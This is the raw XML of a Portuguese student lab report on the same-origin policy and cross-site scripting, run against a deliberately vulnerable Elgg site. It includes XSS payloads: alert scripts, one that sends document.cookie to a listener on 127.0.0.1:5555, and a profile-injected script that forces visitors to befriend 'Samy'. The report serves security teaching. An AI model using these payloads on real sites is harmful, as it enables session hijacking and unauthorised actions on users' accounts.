    </w:p>
    <w:p w14:paraId="77090340" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:r>
        <w:t xml:space="preserve">Se a política SOP não estivesse presenta na API do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, os pedidos realizados através dela estariam vulneráveis a este problema. Assim, não seria possível verificar a origem dos pedidos </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>realizados ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ou seja, scripts de uma origem diferente poderiam ser executados no nosso browser sem o nosso consentimento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE9B32" w14:textId="5324400E" w:rsidR="00AC7F1D" w:rsidRPr="006F56EE" w:rsidRDefault="007D1719" w:rsidP="00AC7F1D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30BA2F41" wp14:editId="71B3A61B">
            <wp:extent cx="4607098" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="3175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14319" cy="145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AAD9D" w14:textId="6717BA91" w:rsidR="007D1719" w:rsidRDefault="007D1719" w:rsidP="00AC7F1D"/>
    <w:p w14:paraId="1B6A6498" w14:textId="25A65800" w:rsidR="00AC7F1D" w:rsidRPr="007D1719" w:rsidRDefault="00AC7F1D" w:rsidP="007D1719">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Quando é efetuado um pedido através do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ao URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00EC6D4C">
          <w:rPr>
            <w:rStyle w:val="Hiperligao"/>
          </w:rPr>
          <w:t>www.soplab.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> , como obedece à política da mesma origem, é executado o código dentro do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> após clique num dos botões (neste caso um alerta com a visualização das cookies/fonte). No caso do</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74FFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00EC6D4C">
          <w:rPr>
            <w:rStyle w:val="Hiperligao"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> , é apanhada uma exceção no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> porque não cumpre o SOP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059FEED4" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1700D400" w14:textId="7AF628E3" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc533420496"/>
      <w:r>
        <w:t>Exercício 6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="508B968F" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRPr="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78"/>
    <w:p w14:paraId="7F6FB16A" w14:textId="6D75666F" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc533420497"/>
      <w:r>
        <w:t>6.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00442818">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="23C31DFF" w14:textId="198A3FC4" w:rsidR="00C54E78" w:rsidRPr="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tarefa</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F2F27" w14:textId="53785CDB" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:r>
        <w:t>Adicionar a descrição do perfil um script que apenas lança um alerta no browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8F1466" w14:textId="7DD1F1FA" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘HELLO</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’);&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5809CB4A" w14:textId="5C6D649D" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="007D1719">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A6137D" wp14:editId="0F467EBA">
            <wp:extent cx="3470031" cy="2238953"/>
            <wp:effectExtent l="0" t="0" r="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88110" cy="225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0D019" w14:textId="0944BD2E" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tarefa 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A4AB4" w14:textId="76643B66" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:r>
        <w:t xml:space="preserve">Adicionar um script </w:t>
      </w:r>
      <w:r>
        <w:t>que lança um alerta no browser contendo o cookie do utilizador</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E47BAE0" w14:textId="1F9FF180" w:rsidR="00C54E78" w:rsidRPr="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">‘HELLO COOKIE’ + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E17472" w14:textId="2C8385C9" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="007D1719">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E7850A8" wp14:editId="08BB0185">
            <wp:extent cx="3629176" cy="2432538"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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71666" cy="246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D22B1" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A082DF3" w14:textId="24738176" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tarefa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757CE55F" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E51D3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E8935" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(’&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">=http://127.0.0.1:5555?c=’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE082C3" w14:textId="56008DD8" w:rsidR="00C54E78" w:rsidRPr="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>+ escape(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C54E78">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">) + ’ &gt;’); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F054E19" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E51D3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F99EC" w14:textId="77777777" w:rsidR="00A200FD" w:rsidRDefault="00C54E78" w:rsidP="00A200FD">
      <w:pPr>
        <w:ind w:firstLine="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0935FF8C" wp14:editId="220DB193">
            <wp:extent cx="5173725" cy="1895475"/>
            <wp:effectExtent l="0" t="0" r="8255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9179" t="4120" b="30711"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5206103" cy="1907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DCDC3E" w14:textId="77777777" w:rsidR="00A200FD" w:rsidRDefault="00A200FD" w:rsidP="00A200FD">
      <w:pPr>
        <w:ind w:firstLine="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFA1E4D" w14:textId="77777777" w:rsidR="00A200FD" w:rsidRDefault="00A200FD" w:rsidP="00A200FD">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc533420498"/>
      <w:r>
        <w:t>6.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00442818">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="538289CA" w14:textId="36608EA6" w:rsidR="00BC657B" w:rsidRDefault="00BC657B" w:rsidP="00BC657B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tarefa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35ECF3" w14:textId="1ABAB27B" w:rsidR="00C54E78" w:rsidRPr="00BC657B" w:rsidRDefault="00A34CA8" w:rsidP="00A34CA8">
      <w:r>
        <w:t xml:space="preserve">Numa primeira fase, foi feito o login numa conta e executado um pedido de amizade à conta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de modo a, através da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de inspeção de pedidos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do Firefox, analisar o pedido que é realizado nessa ação:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D01997" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C609FB0" wp14:editId="536242AE">
            <wp:extent cx="4704092" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="127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09729" cy="348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2A49A" w14:textId="075DE916" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78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DC35A8D" wp14:editId="1EDF9F53">
            <wp:extent cx="3390900" cy="508953"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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49807" cy="51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75C15" w14:textId="77777777" w:rsidR="00E2612F" w:rsidRDefault="00A34CA8" w:rsidP="00C54E78">
      <w:r>
        <w:t xml:space="preserve">Foi possível verificar que o identificar da conta do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> é o número 47. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257ED64B" w14:textId="77777777" w:rsidR="00E2612F" w:rsidRDefault="00A34CA8" w:rsidP="00C54E78">
      <w:r>
        <w:t xml:space="preserve">Deste modo, o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do pedido no nosso script de ataque será</w:t>
      </w:r>
      <w:r w:rsidR="00E2612F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C3A0A6" w14:textId="500ACD9A" w:rsidR="00A34CA8" w:rsidRDefault="00E2612F" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E2612F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="00E2612F">
          <w:rPr>
            <w:rStyle w:val="Hiperligao"/>
            <w:b/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://www.xsslabelgg.com/action/friend=47</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E2612F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E2612F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E2612F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> + token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA9A17" w14:textId="2F42E673" w:rsidR="00E2612F" w:rsidRDefault="00E2612F" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08304CD0" w14:textId="3B144278" w:rsidR="00E2612F" w:rsidRDefault="00E2612F" w:rsidP="00C54E78">
      <w:r w:rsidRPr="00E2612F">
        <w:t>Adicionou-se o script na secç</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ão </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>About</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> me no modo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E2612F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Edit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E2612F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Na execução do exercício foi adicionado um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no script apenas de modo a facilitar a verificação que o script corre, sendo que na realidade não teria nexo realizá-lo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348F851F" w14:textId="3670CF5D" w:rsidR="00E2612F" w:rsidRDefault="00E2612F" w:rsidP="00C54E78">
      <w:r>
        <w:t xml:space="preserve">Fez-se login numa outra conta, diferente da do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, e ao aceder-se à pagina do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi possível verificar que o ataque foi </w:t>
      </w:r>
      <w:r w:rsidR="00A200FD">
        <w:t>bem-sucedido</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29915092" w14:textId="77777777" w:rsidR="00A200FD" w:rsidRPr="00E2612F" w:rsidRDefault="00A200FD" w:rsidP="00C54E78"/>
    <w:p w14:paraId="68216D40" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13120762" wp14:editId="35B1F160">
            <wp:extent cx="5400040" cy="473202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A6822" w14:textId="051C96D0" w:rsidR="00A34CA8" w:rsidRDefault="00C54E78" w:rsidP="00A200FD">
      <w:pPr>
        <w:ind w:firstLine="284"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0685C140" wp14:editId="545371C4">
            <wp:extent cx="5400040" cy="2131060"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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E82A7" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRPr="005E61DC" w:rsidRDefault="00C54E78" w:rsidP="00A200FD">
      <w:pPr>
        <w:ind w:firstLine="142"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20404AEA" wp14:editId="5D86BD43">
            <wp:extent cx="5400040" cy="236474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2A559" w14:textId="77777777" w:rsidR="00A34CA8" w:rsidRDefault="00A34CA8" w:rsidP="00A34CA8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41455909" w14:textId="38A40F7B" w:rsidR="00A34CA8" w:rsidRPr="00A34CA8" w:rsidRDefault="00A34CA8" w:rsidP="00A34CA8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Questão 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A34CA8">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58495357" w14:textId="7C85EB62" w:rsidR="00A34CA8" w:rsidRPr="00A34CA8" w:rsidRDefault="00A34CA8" w:rsidP="00A34CA8">
      <w:r w:rsidRPr="00BC657B">
        <w:t xml:space="preserve">Os </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC657B">
        <w:t>tokens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC657B">
        <w:t xml:space="preserve"> identificam o</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC657B">
        <w:t xml:space="preserve"> utilizadores e garantem que quem realizou o pedido é de facto esse utilizador, visto que o cookie por si só não basta para identificar o utilizador, pois outra aplicação pode obter o cookie.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Servem, assim, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC657B">
        <w:t xml:space="preserve">para evitar ataques do tipo </w:t>
      </w:r>
      <w:r>
        <w:t>CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936F4F7" w14:textId="77777777" w:rsidR="00C54E78" w:rsidRPr="00BC2F3F" w:rsidRDefault="00C54E78" w:rsidP="00C54E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015C5362" w14:textId="74D316FD" w:rsidR="00AC7F1D" w:rsidRPr="00A34CA8" w:rsidRDefault="00A34CA8" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A34CA8">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Questão 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F978377" w14:textId="2060E977" w:rsidR="00A34CA8" w:rsidRPr="00A34CA8" w:rsidRDefault="00A34CA8" w:rsidP="00E2612F">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r>
        <w:t>Na Tarefa 1 foi possível executar um script através do campo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brief</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”, logo seria possível realizar o ataque da mesma forma, porém, sendo um script de maior dimensão, teríamos de o referenciar pelo atributo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A34CA8" w:rsidRPr="00A34CA8">
      <w:footerReference w:type="even" r:id="rId43"/>
      <w:footerReference w:type="default" r:id="rId44"/>
      <w:footerReference w:type="first" r:id="rId45"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1278" w:right="1362" w:bottom="1425" w:left="1702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5206C3" w14:textId="77777777" w:rsidR="00617016" w:rsidRDefault="00617016">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="523F9C47" w14:textId="77777777" w:rsidR="00617016" w:rsidRDefault="006170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22BE9B" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:right="336" w:firstLine="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
